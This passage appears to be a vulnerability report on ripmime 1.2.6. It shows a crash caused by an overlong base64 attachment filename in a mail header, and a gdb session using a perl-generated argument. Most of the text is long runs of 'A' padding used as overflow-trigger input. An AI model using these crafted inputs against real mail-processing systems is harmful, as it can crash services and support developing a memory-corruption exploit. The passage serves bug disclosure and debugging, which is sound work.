AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_
for BASE64 decoding.Segmentation fault

We are using a standard mail file with an incorrect header, particularly the BASE64 filename
Content-Type: application/octet-stream;
 name="blah"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename=AAAAAAAAAAAAAAAAAAA....<2000 total chars>


Let's look at this more in depth using gdb.
(gdb) r -i mail -d `perl -e 'print "A" x 79'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ripmime-1.2.6/./ripmime -i mail -d `perl -e 'print "A" x 79'`
Error: Cannot open output file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA